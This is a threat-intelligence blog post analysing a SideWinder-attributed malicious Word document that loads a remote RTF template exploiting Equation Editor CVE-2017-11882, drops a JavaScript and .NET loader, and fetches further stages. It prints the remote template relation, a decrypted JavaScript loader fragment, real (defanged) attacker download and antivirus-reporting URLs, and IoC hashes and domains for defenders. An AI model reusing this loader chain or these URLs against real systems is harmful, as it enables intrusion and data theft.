# 404 — File still found

**[medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c](https://medium.com/@DCSO_CyTec/404-file-still-found-d52c3834084c)**

DCSO CyTec Blog April 15, 2022

[DCSO CyTec Blog](https://medium.com/@DCSO_CyTec?source=post_page-----d52c3834084c--------------------------------)

Apr 14


9 min read

In early February 2022, we came across a tweet from identifying a SideWinder-related word
document which referenced a template URL. In this article, we share our insights from
investigating the file and other infrastructure connected to it.

## First Look

[The file mentioned in the tweet is named ‘Briefing on Ongoing](https://twitter.com/ShadowChasing1/status/1490984172797984770)
_Projects.docx’(eeeb99f94029fd366dcde7da2a75a849833c5f5932d8f1412a89ca15b9e9ebb7)_
[and is available on VirusTotal and on our GitHub.](https://www.virustotal.com/gui/file/eeeb99f94029fd366dcde7da2a75a849833c5f5932d8f1412a89ca15b9e9ebb7)


-----

The document itself contains little information and appears empty aside from the address
block. However, a deeper inspection of the document structure reveals that the document
loads an RTF template from `https://dgmp-paknavy.mod-`

`pk[.]com/14325/1/10/2/0/0/0/m/files-5291bef6/file.rtf` which we assume
represents the next stage of the attack. At the time of our analysis, this file was not available
under the given URL anymore, yet the domain still resolved to `185.255.17.46 .`

After unpacking the document structure, we could locate the suspicious URL under the path
_s. It generally refers to relations and in this case aims to download a RTF template as shown_
in the code snippet below:
```
# <Relationship
Id="fid990"Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/o
paknavy.mod-pk[.]com/14325/1/10/2/0/0/0/m/files5291bef6/file.rtf"TargetMode="External"/>

```
With the URL being dead, we went back to VirusTotal to use the graph feature. It indicates
that file.rtf indeed was downloaded and provides the file’s hash,. Based on this, we continue
our analysis by looking into file.rtf.


-----

VirusTotal contact graph of ‘

## file.rtf(1)

[Our next step was now to analyze the .rtf file with the hash available on VirusTotal and on](https://www.virustotal.com/gui/file/1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a)
our [GitHub.](https://github.com/DCSO/Blog_CyTec/tree/main/404_file_still_found/rtf(1)_1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a)

Unfortunately, the content of the RTF file seems not to be malicious as it is only one line with
less than ten characters. The complete content of the file is shown below:
```
{\rtf1 }

```
The file itself was first uploaded to VirusTotal on 2021–11–03 and had therefore already been
online for quite some time. Yet it appears to be some kind of placeholder file. Checking the
[listed relations of this file on VirusTotal clearly shows its relation to the analyzed document:](https://www.virustotal.com/gui/file/1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a/relations)


-----

Relation between the file.rtf and as malicious marked domains on VirusTotal
All domains listed in this screenshot above follow the same path pattern which can be
described as:

_<…> /0/0/0/m/files-<hex_data>/file.rtf_

From this information, we assume that the original malicious RTF file was replaced after the
initial delivery with a placeholder file. This file is small in size and not rich in content, yet it is
unique enough to lead to related attacker domains on VirusTotal since it’s not a default file.

Reviewing all related domains on the list revealed that the domain `dgmp-paknavy.mod-`

`pk[.]com has relations to another RTF file ()` [available on VirusTotal, which potentially could](https://www.virustotal.com/gui/file/4e3c4ea383e6ed5c00672e08adabe24fc142cd05c86830a79c15c90412a2f588)
have been the file.rtf before replacement.

## file.rtf(2)

As mentioned above, our next step aims to analyze another RTF file we will refer to as
_[file.rtf(2) with the hash . The file is available on VirusTotal and on our](https://www.virustotal.com/gui/file/4e3c4ea383e6ed5c00672e08adabe24fc142cd05c86830a79c15c90412a2f588)_ [GitHub.](https://github.com/DCSO/Blog_CyTec/tree/main/404_file_still_found/rtf(2)_4e3c4ea383e6ed5c00672e08adabe24fc142cd05c86830a79c15c90412a2f588)

A first look at the file is promising, as the file size is 66.21 KB and was initially submitted to
VirusTotal on 2022–02–08. The file is indeed a valid Rich Text Format file and contains the
three sections listed in the screenshot below.


-----

The RTF file contains three sections

rtfobj reveals more information
As soon as we extracted the first object (1.a, ) we noticed, that the hash was mentioned by
[another researcher as part of the malicious document on Twitter, reinforcing our assumption](https://twitter.com/ayaz2hussain/status/1491340118229385216)
of this being the original file.rtf.


-----

Beside 1.a, the RTF file contains another embedded object which will be triggered via
_\objupdate when the document is loaded. This indicates the next execution step after_
‘Briefing on Ongoing Projects.docx’ has reloaded the RTF file.

Raw view on embedded object triggered via \objupdate
The triggered code attempts to execute the embedded Equation Editor object which has
known vulnerabilities. The CVEs of these vulnerabilities are CVE-2017-11882(FONT), CVE[2018-0798(MATRIX) and CVE-2018-0802(FONT) as mentioned here and](https://www.anomali.com/blog/multiple-chinese-threat-groups-exploiting-cve-2018-0798-equation-editor-vulnerability-since-late-2018) [here.](https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-SaadRaggi.pdf)

The CVE listed for file.rtf(2) on VirusTotal is CVE-2017–11882, which indicates code
execution based on unchecked font name input length.

To verify this claim, we have created a 010 Editor template to parse the embedded object
[based on the protocol description of OLE objects and](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-oleds/3c695db0-943f-48a0-b134-939af3b3a4ca) [MTEF objects. We](http://rtf2latex2e.sourceforge.net/MTEF3.html) [share the template](https://github.com/DCSO/Blog_CyTec/blob/main/404_file_still_found/010editor_template/ole_mtef_font.bt)
on our GitHub page along with the analysis files. The parser now allows us to follow the
execution flow further by extracting the initial exploit code contained in the FONT name
section of the object.


-----

Parsed OLE/MTEF object with overflowing FONT name containing shellcode (red)
After extracting and converting the shellcode via CyberChef, it becomes clear that the exploit
[code abuses the FONT name field. The exploit code then (code in CyberChef) triggers a](https://gchq.github.io/CyberChef/#recipe=Disassemble_x86('32','Full%20x86%20architecture',16,0,true,true)&input=QkEgMzYgNjQgNkYgMUQgODEgQzIgMDYgNTkgRDYgRTIgOEIgMEEgOEIgMjkgQkYKQkMgNkIgMjIgQTYgODEgRjcgMEMgMEMgNjQgQTYgOEIgMTcgNTUgRkYgRDIgMDUKRDQgMTIgNzUgOTUgMkQgMDUgMTIgNzUgOTUgRkYgRTAK)
[loop (code in CyberChef) to decrypt embedded xor-encrypted JavaScript code. The xor key](https://gchq.github.io/CyberChef/#recipe=Disassemble_x86('32','Full%20x86%20architecture',16,0,true,true)&input=NTkgMzEgRDIgOEEgMUMgMTEgODAgRkIgMDAgNzQgMEEKODAgRjMgMTIgODggMUMgMTAgNDIgNDAgRUIgRUUgQzYgMDQgMTAgMDAgRUIgMUQKNUIgNTggQzYgMDAgNkIgQzYgNDAgMUUgNEMgQzYgNDAgMzggNDcgQzYgODAgQzgKMDAgMDAgMDAgNTIgNTAgNTMgRTkgRjUgMDAgMDAgMDAgOTAgOTAgOTA)
used in this case is 12.

[The assembler code used for the exploit coincides with findings in this article here. The](https://fastcall.medium.com/cve-2017-11882-rtf-44d671dc0fce)
disassembly for the exploit and the xor decryption is shown below:

CyberChef disassembly of the exploit code


-----

CyberChef disassembly of XOR loop
The decrypted JavaScript code listed below executes the file 1.a, which is dropped to a temp
path when the RTF is loaded:
```
javascript:eval("sa=ActiveXObject;ab=new
sa(\"Scripting.FileSystemObject\");eval(ab.OpenTextFile(ab.GetSpecialFolder(2)+\"\\\\1

```
The 1.a file is stored on disc in obfuscated form in order to hinder automated analysis. We
[share the obfuscated and](https://github.com/DCSO/Blog_CyTec/blob/main/404_file_still_found/rtf(2)_4e3c4ea383e6ed5c00672e08adabe24fc142cd05c86830a79c15c90412a2f588/extracted/1.a) [deobfuscated file on GitHub.](https://github.com/DCSO/Blog_CyTec/blob/main/404_file_still_found/rtf(2)_4e3c4ea383e6ed5c00672e08adabe24fc142cd05c86830a79c15c90412a2f588/extracted/deobfuscated_1_a/1_a.js)

On execution, the file deserialises an object, identifies existing Antivirus software and
attaches them as variable to a URL. The deserialised object will be invoked by calling the
function “work” with two slightly different URLs, which we assume are used for downloading


-----

the next stage and error reporting.

The included URLs are listed below:
```
Next stage:https://dgmp-paknavy.modpk[.]com/14325/1/10/3/1/1/1865884360/uAiXa3upVnbI8GnagA2EgfGUnQxzUvVIEq4r3YTr/filesf3046d06/1/Error reporting:https://dgmp-paknavy.modpk[.]com/14325/1/10/3/3/0/1865884360/uAiXa3upVnbI8GnagA2EgfGUnQxzUvVIEq4r3YTr/files984c52a9/0/data?d=<AV_PRODUCTS_ON_HOST>

```
Next, we extracted the deserialised .NET object
[(95f99d5da860ece23154ddef0bb289797dc2bd711034ce39c1ac85b9305919cb) and](https://github.com/DCSO/Blog_CyTec/blob/main/404_file_still_found/rtf(2)_4e3c4ea383e6ed5c00672e08adabe24fc142cd05c86830a79c15c90412a2f588/extracted/deobfuscated_1_a/extracted/95f99d5da860ece23154ddef0bb289797dc2bd711034ce39c1ac85b9305919cb_dot_net.bin)
decompiled it with ILSpy. Unsurprisingly, this file was obfuscated as well, so we provide the
[obfuscated and the](https://github.com/DCSO/Blog_CyTec/blob/main/404_file_still_found/rtf(2)_4e3c4ea383e6ed5c00672e08adabe24fc142cd05c86830a79c15c90412a2f588/extracted/deobfuscated_1_a/extracted/95f99d5da860ece23154ddef0bb289797dc2bd711034ce39c1ac85b9305919cb_dot_net.bin) [deobfuscated file on GitHub, too.](https://github.com/DCSO/Blog_CyTec/blob/main/404_file_still_found/rtf(2)_4e3c4ea383e6ed5c00672e08adabe24fc142cd05c86830a79c15c90412a2f588/extracted/deobfuscated_1_a/extracted/deobfuscated/deobfuscated_program.cs)

In general, the program evaluates the previously discovered Antivirus software and reports it
if available. If “work” is called with a local file path, the script executes the contained
Windows shell commands, embedding it into a WshShell JavaScript object which it executes
via mshta.exe. If “work” is called with a URL, as seen in our sample, a file containing
assembly commands will be downloaded. It is then decrypted with a 32 bit key prepended to
the specific file and executed. Notably, there’s also error reporting capabilities. The program
reports exceptions at different positions throughout the execution of the program by
appending an exception message to the URL before calling them.

[During our analysis and validation, we found related work analyzing similar malicious](https://ebryx.com/exposing-sidewinders-arsenal-against-windows-2/)
documents which correspond to our sample. The article dissects the samples by explaining it
in depth and validates the attribution claim made in the initial tweet of our article. Based on
the structure and used vulnerability this file seems to be related to the Royal Road v3
[framework as mentioned here.](https://www.virusbulletin.com/virusbulletin/2020/03/vb2019-paper-attribution-object-using-rtf-object-dimensions-track-apt-phishing-weaponizers/)

At this point, there were no clear indicators or hashes of the next execution stage, and we
therefore stopped following the execution path further.

## Attack Chain

Here, we summarize the execution flow of the file. The malicious document will be opened
by the victim and a RTF template file is then loaded. This RTF file contains the remote code
execution exploit CVE-2017–11882 which abuses a FONT name vulnerability in the Equation
Editor triggered via an embedded Equation Editor object. The exploit executes a JavaScript
file, previously written to disk through the RTF template, which then executes .NET code.
This file downloads another stage which is no longer available online. The ability to execute
an already existing local file is implemented in the code, but not used in this process flow.


-----

Malicious execution flow of the document

## Placeholder files


-----

As mentioned before, the nearly empty file.rtf(1) we initially found wasn t very useful in terms
of content. We assume that the original file on the server was removed to protect the
following stage by replacing it with a placeholder file. Yet, because the file is custom, it can
be utilized as identifier and establish a relationship between the attacks. In this case, we are
able to link eight domains as shown below.

VirusTotal indicates communication between maldocs and the placeholder file
Based on the given relation on VirusTotal, the URLs of these eight domains all exhibit the
same path pattern ( <…> /0/0/0/m/files-<hex_data>/file.rtf) which supports the assumption of
a possible connection between them. We list the domains below.


-----

```
http://dgmp paknavy.mod pk[.]com/14325/1/10/2/0/0/0/m/files
5291bef6/file.rtfhttp://dgpr.paknvay-pk[.]net/5330/1/1330/2/0/0/0/m/files4d9d0395/file.rtfhttp://maritimepakistan.kpt-pk[.]net/5434/1/3694/2/0/0/0/m/filesce32ed85/file.rtfhttp://mohgovsg.bahariafoundation[.]live/5320/1/13/2/0/0/0/m/files1ddf5195/file.rtfhttps://cabinet-gov-pk.ministrypk[.]net/14300/1/1273/2/0/0/0/m/files68ebf815/file.rtfhttps://careitservices.paknvay-pk[.]net/5359/1/4586/2/0/0/0/m/files266ad911/file.rtfhttps://defencelk.cvix[.]live/3023/1/54082/2/0/0/0/m/files0c31ed2d/file.rtfhttps://dgmp-paknavy.mod-pk[.]com/14325/1/10/2/0/0/0/m/files5291bef6/file.rtfhttps://dgpr.paknvay-pk[.]net/5330/1/1330/2/0/0/0/m/files4d9d0395/file.rtfhttps://mailaplf.cvix[.]live/2968/1/50390/2/0/0/0/m/files7630e91a/file.rtfhttps://maritimepakistan.kpt-pk[.]net/5434/1/3694/2/0/0/0/m/filesce32ed85/file.rtfhttps://mohgovsg.bahariafoundation[.]live/5320/1/13/2/0/0/0/m/files1ddf5195/file.rtfhttps://sppc.moma-pk[.]org/5281/1/4265/2/0/0/0/m/filesd2608a99/file.rtfhttps://srilankanavy.ksew[.]org/5471/1/1101/2/0/0/0/m/filescd6e6dbd/file.rtf

```
A quick check of the domains led to related posts attributing the domains to the same APT,
shown in the list below.

In conclusion, this placeholder file creates a relationship between several different attacks,
supporting the attribution made by other researchers.

[In addition, we checked the validity period of the TLS certificates on crt.sh for the domains in](https://crt.sh/)
question. The graphic below illustrates the validity periods of the relevant TLS certificates,
and even though we can’t be sure when exactly the attacks were carried out, we can at least
narrow down the time frame.

Validity span of TLS certificates for each identified domain

## Conclusion


-----

A sample attributed to SideWinder was published on Twitter. We analyzed the sample and
followed related IoCs as far as possible. Along this analysis, we found related work verifying
the file structure and attribution. We also noticed that different SideWinder samples
downloaded the same nearly empty RTF file which we assume acts as placeholder file after
the original payload was delivered. This placeholder file itself is not considered a default file
which allowed us to identify related domains of this campaign.

All extracted and deobfuscated files can be downloaded from our GitHub repository DCSO
CyTec.

## IoCs

[We provide a MISP event on our GitHub.](https://github.com/DCSO/Blog_CyTec/blob/main/404_file_still_found/misp_event_0b671240-5c9a-4323-afff-b5fc8f632d46.json)
```
### SHA256## Document from
Tweeteeeb99f94029fd366dcde7da2a75a849833c5f5932d8f1412a89ca15b9e9ebb7## Placeholder
RTF Template1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a##
Malicious RTF
Template4e3c4ea383e6ed5c00672e08adabe24fc142cd05c86830a79c15c90412a2f588## Malicious
embedded JavaScript
c2809dcc935ed3c7923f1da67d1c5dddc4ece2353a4c0eab8c511a14fa7e04c1## Malicious embedded
.Net file95f99d5da860ece23154ddef0bb289797dc2bd711034ce39c1ac85b9305919cb## Documents
linked to RTF placeholder file
cb933361cd6c26ca61c441a40da394a505086f572fd7e9bd425bf086adf50edc6a00b6f20123258fb8db9c
 URLshttp://dgmp-paknavy.mod-pk[.]com/14325/1/10/2/0/0/0/m/files5291bef6/file.rtfhttp://dgpr.paknvay-pk[.]net/5330/1/1330/2/0/0/0/m/files4d9d0395/file.rtfhttp://mohgovsg.bahariafoundation[.]live/5320/1/13/2/0/0/0/m/files1ddf5195/file.rtfhttps://cabinet-gov-pk.ministrypk[.]net/14300/1/1273/2/0/0/0/m/files68ebf815/file.rtfhttps://careitservices.paknvay-pk[.]net/5359/1/4586/2/0/0/0/m/files266ad911/file.rtfhttps://defencelk.cvix[.]live/3023/1/54082/2/0/0/0/m/files0c31ed2d/file.rtfhttps://dgmp-paknavy.mod-pk[.]com/14325/1/10/2/0/0/0/m/files5291bef6/file.rtfhttps://dgpr.paknvay-pk[.]net/5330/1/1330/2/0/0/0/m/files4d9d0395/file.rtfhttps://mailaplf.cvix[.]live/2968/1/50390/2/0/0/0/m/files7630e91a/file.rtfhttps://mohgovsg.bahariafoundation[.]live/5320/1/13/2/0/0/0/m/files1ddf5195/file.rtfhttps://sppc.moma-pk[.]org/5281/1/4265/2/0/0/0/m/filesd2608a99/file.rtfhttps://srilankanavy.ksew[.]org/5471/1/1101/2/0/0/0/m/filescd6e6dbd/file.rtfhttp://maritimepakistan.kpt-pk[.]net/5434/1/3694/2/0/0/0/m/filesce32ed85/file.rtfhttps://maritimepakistan.kpt-pk[.]net/5434/1/3694/2/0/0/0/m/filesce32ed85/file.rtf### Domainsbahariafoundation[.]livecvix[.]livekptpk[.]netksew[.]orgministry-pk[.]netmod-pk[.]commoma-pk[.]orgpaknvay-pk[.]net

```

-----